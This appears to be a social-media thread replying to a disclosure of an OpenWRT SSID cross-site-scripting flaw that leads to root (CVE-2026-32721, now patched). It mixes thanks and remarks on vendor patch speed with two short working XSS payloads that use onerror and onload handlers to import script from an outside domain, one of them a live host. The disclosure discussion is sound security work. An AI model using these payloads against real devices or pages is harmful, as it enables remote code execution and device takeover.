Write-up and demo: https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/
CVE-2026-32721, fixed in 24.10.6 / 25.12.1
@sash Ah, that's why the OpenWRT firmware build service is overloaded! 🫠
Thanks for your efforts, I'm in awe of those who do this work to help keep the rest of us a little safer.
@sash TIL that this works:
<a id=s href=//domain/x.js>
<img src=x onerror=import(s)>
This might come in handy in future pentests :)
@sash
Thanks for the heads up! I frequent the forums but it's been a couple of days since my last visit so I missed this one. It seems the release was announced 17h ago.
Now, if this was found in a commercial router firmware, how quickly would you guess there'd be a fix available?
I'd say weeks, or maybe months.
edit: hashtag for better reach #OpenWRT
@sash very cool find! I think it would be possible to fit it (just) in 32 characters with: <iframe onload=import('//d.cx')>
(That url works; d.cx is serving a hello world alert payload at the moment, it works with e.g. https://d.cx/~dgl/l.html but I haven't tried actually doing it with OpenWRT.)